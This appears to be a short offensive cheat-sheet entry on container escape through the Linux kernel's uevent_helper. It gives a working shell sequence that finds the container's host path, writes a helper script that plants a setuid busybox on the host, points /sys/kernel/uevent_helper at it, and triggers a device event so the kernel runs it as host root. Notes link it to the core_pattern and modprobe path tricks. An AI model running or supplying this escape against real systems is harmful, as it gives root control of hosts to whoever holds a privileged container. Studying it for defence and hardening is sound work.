/sys/kernel/uevent_helper is the legacy hotplug helper: a program the kernel forks, as root in the host context, on each device uevent. With a writable host /sys (privileged container or CAP_SYS_ADMIN), overwrite it with a host-visible helper and fire a synthetic uevent to run code on the host.
host_path=$(sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /proc/self/mountinfo | head -1)
cat > /x <<'SH'
#!/bin/sh
cp /bin/busybox /host_marker && chmod +s /host_marker
SH
chmod +x /x
echo "$host_path/x" > /sys/kernel/uevent_helper
# Trigger a uevent on any device
echo change > /sys/class/mem/null/uevent
Exploitation notes#
uevent_helperis empty by default on modern systems (udev uses a netlink socket instead), so setting it at all is the attack; the kernel still honors it when non-empty.- Writing any device's
ueventfile with an action keyword (add,change) generates the event that invokes the helper. - A sibling of core_pattern and modprobe path: same gate, same host-visible-path trick.